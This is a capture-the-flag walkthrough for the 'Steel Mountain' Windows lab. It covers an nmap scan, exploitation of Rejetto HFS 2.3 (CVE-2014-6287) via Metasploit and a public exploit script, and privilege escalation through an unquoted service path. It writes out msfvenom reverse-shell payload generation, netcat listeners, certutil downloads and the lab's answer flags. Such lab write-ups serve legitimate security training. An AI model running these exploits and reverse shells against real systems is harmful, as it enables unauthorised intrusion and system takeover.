Steel Mountain

Windows box, HFS

Scanning

nmap -sS -A 10.10.227.204 -oN recon.nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-28 14:57 BST
Nmap scan report for ip-10-10-227-204.eu-west-1.compute.internal (10.10.227.204)
Host is up (0.00050s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl          Microsoft SChannel TLS
| fingerprint-strings: 
|   TLSSessionReq: 
|     i]cW
|     \x9bK
|     !r|b
|     steelmountain0
|     230327134335Z
|     230926134335Z0
|     steelmountain0
|     Y7;7
|     \x18
|     S~M>t%
|     T}}~
|     lJW2
|     $0"0
|     iBD\x18
|     $ejT
|_    Ur^Cg
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-03-27T13:43:35
|_Not valid after:  2023-09-26T13:43:35
|_ssl-date: 2023-03-28T13:59:36+00:00; 0s from scanner time.
8080/tcp  open  http         HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=3/28%Time=6422F28B%P=x86_64-pc-linux-gnu%r(TL
SF:SSessionReq,346,"\x16\x03\x03\x03A\x02\0\0M\x03\x03d\"\xf2\x86\r\x9f\x9
SF:3\xefi\]cW\xad\\\x9bK\xae\x01NE\xb6\|vg\xf9\x10\x1a\xf3\x0b\x11\x88s\x2
SF:0\xf2=\0\0\xb1\x91,\x9d\x04\xe6o\xe6\x97\x05\x02c\xfd\(A\xad\xb8\xd8L6\
SF:xad\xeb\xbe-\xb7\x1c\x13\xfc\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\xe8\0
SF:\x02\xe5\0\x02\xe20\x82\x02\xde0\x82\x01\xc6\xa0\x03\x02\x01\x02\x02\x1
SF:0=\|\xaf\xce\x9d\xceY\xb7K\x13\xb9!r\|b\xf70\r\x06\t\*\x86H\x86\xf7\r\x
SF:01\x01\x05\x05\x000\x181\x160\x14\x06\x03U\x04\x03\x13\rsteelmountain0\
SF:x1e\x17\r230327134335Z\x17\r230926134335Z0\x181\x160\x14\x06\x03U\x04\x
SF:03\x13\rsteelmountain0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x01\
SF:x05\0\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\xb5V\x7f\x0f\xfd
SF:\xb6\0\x05\x98\x19\xe0-\xffH\xd3\xd9<\xae2\xf1\]\x0e\xdd\x1a\xde`y\x9e\
SF:x1a\xf8\x92\x88\*\xbfHu\x13B}\x8e\x1b\x9d\x9a\xd8\xda\xa5\x1a\)\x1fE\xc
SF:9\xa6\xca\xdb\xcfua2\xef\x14rg\x9d\xaf\[6\xc4\x9dz\x0e<\xa4<\xe2\xc2\xa
SF:0\xf2\xf2\x16t\xb8>\x0e\x8c/\xc2\xc2\x04Y\x85M\x0b\xae3\xef\xd2\xcb\x95
SF:\)\x12Y7;7\xe6\xf2\xae\\\x18\x93\x8d\x12p\x10\xb7\xd8\xdb\xd6\xb5DX\xa1
SF:\x1c\x05\xe3KV\x1f\xbf\x81\xdc\x9b\xf1\xd4:\x91\x81pd#\xa5\xde\xd7{\xe7
SF:<\x8d:c\xc4\xce\xc01=\x8e\x13U%W\x996\x01\x8e\xc7\xc8\x97b\xd5S~M>t%\x1
SF:6\xd5l\"\x01\xe4\x9f6\xb1\xbdBUm\x80\xafS\xf8\xc32\xf0\xaak\x13\x8cv_`\
SF:x1a\xb6\x20Ex\xab2\xb2NsR\xe2\xfb\x93EL\x14}\xc6\xa5\xd0IR\xad\xd9\x90&
SF:`\xdf\xa1\x04\xa1\xd55;\[\xddT}}~\x0bD\xfblJW2\x9a\xcdV\xed\x92W\xcb\x0
SF:2\x03\x01\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08\+\x06\x0
SF:1\x05\x05\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x0400\r\x06
SF:\t\*\x86H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0I\xfa\xe4fv\x1d\
SF:xf1\x93\xca\xc4\xadiBD\\\x18\xe8\xae4f\xd7\x15\xd3QV\xfc\x95\x89T\x1b\x
SF:bc\$ejT\xf3\x90\xe2\xa5\xd4\"B\xb9\x16V\xbc\x80\xa9\xc8\xb9I\x9dYf\xcb\
SF:xc2rZ\xf8\xd3DcA\xec\xf6\xc7;\x9dka\xc1\x07-\xab\x7f,\xbd\xdb\x1e\xac\x
SF:13w~\xde\x0e\]\xe6\xf6t\x88\xcf\xa9O\xb5Q\xde\xcas\xc2\x14T\xbbF\x0b\xa
SF:bD\xfa\x17\xbb\xcb\x9d/\0\xb4\x0b\x12\xdf6\xe9\x08\xa0\x8d\x89\xe8\x96\
SF:x11\xaaZ\xbd\xf5I4\x9d\t\xd3e\x8c\xaf\x85UF\xae\xdeM\xd9\x07<\xec\xb1q\
SF:x84t\xb2Q\x20\xe2`\x1d\xfb\xbd\"\x10\xc5h;\xbb\xb1\xfc\xfcUr\^Cg\xfd\xc
SF:9\xd4\x04\x97\*\xb2pb9\xf1\x8f\xc0\xe1\x8c\x0c\x0eg'P\x19\x136\xc0\x032
SF:T\x07\xed}\xcdU\x9f\x0c\x9e\xb3\xbc7\xce\x8f\xd9\x14D\xdbd\x97Ma\x13\xf
SF:d\x1e\x9e\xd9i\xd5\xbe\xa8\xeb\x9f\x86\x11\x8f_\xff\xb5\xbd\xba\xdc\xe8
SF:J\xfb4\.\xa9\xd0\x05Q\x1d\x94%\xed\xb2\x0e\0\0\0");
MAC Address: 02:63:4A:A4:5E:63 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/28%OT=80%CT=1%CU=41505%PV=Y%DS=1%DC=D%G=Y%M=02634A%T
OS:M=6422F2CE%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%TS=7
OS:)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=RD%II=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%
OS:O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301NW8ST11%O5=M2301NW8ST11%O6=M230
OS:1ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T
OS:=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:63:4a:a4:5e:63 (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-28 14:59:36
|_  start_date: 2023-03-28 14:43:25

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms ip-10-10-227-204.eu-west-1.compute.internal (10.10.227.204)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.48 seconds

There are two webservers running, one on port 80 and the other oner on port 8080.

The other server is being run on port 8080 with HFS 2.3. it has a number of exploits

lets first exploit it with metasploit

use exploit/windows/http/rejetto_hfs_exec 
set RPORT 8080
set  RHOSTS 10.10.227.204
exploit

And we get a meterpreter shell. Move to the desktop folder and get the user flag

Scan the machine with nmap. What is the other port running a web server on?

8080

Take a look at the other web server. What file server is running?

rejetto http file server

What is the CVE number to exploit this file server?

2014-6287

Use Metasploit to get an initial shell. What is the user flag?

b04763b6fcf51fcd7c13abc7db4fd365

Priv escalation

lets first check msf exploit suggester

use post/multi/recon/local_exploit_suggester

it only found exploit/windows/local/bypassuac_eventvwr which did not work

Enumeration with powerup.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

upload the script with metasploit

upload /root/PowerSploit/Privesc/PowerUp.ps1

Now run the script with Powershell

load Powershell
powershell_shell
.\PowerUp.ps1
Invoke-Allchecks

The Iobit AdvancedSystemCareService9 service is vulnerable to path hijack. No quotes are being used to enclose the path.

unquoted service path vulnerability

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Now create a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

using reverse meterpreter payload dies if used and we have to chain it with post/windows/manage/migrate

Now upload the malicious file and changer meterpreter to shell, stop the service and then copy the file the same location, start listener at port 4443 and start the service again.

upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

and we got the reverse shell

Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

AdvancedSystemCareService9

What is the root flag?

9af5f314f57607c00fd09803a587db80

Manual Exploitation

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)Exploit Database

Change the ip address within the file to your local ip

Now download the netcat binay and host it on the webserver.

static-binaries/binaries/windows/x86/ncat.exe at master · andrew-d/static-binariesGitHub

python3 -m http.server 80
nc -lnvp 443 
python2 39161.py 10.10.3.221 8080

now get the winpeas on your system

wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe

certutil -urlcache -f http://10.8.64.134:80/winpeas.exe winPEASx86.exe

use the 64 bit version

So, we can copy the malicious payload as above and do the privilege escalation.

PreviousKenobi NextMalware Analysis

Last updated 1 month ago

hashtagScanning

hashtagPriv escalation

hashtagEnumeration with powerup.ps1

hashtagunquoted service path vulnerability

hashtagManual Exploitation

Scanning

Priv escalation

Enumeration with powerup.ps1

unquoted service path vulnerability

Manual Exploitation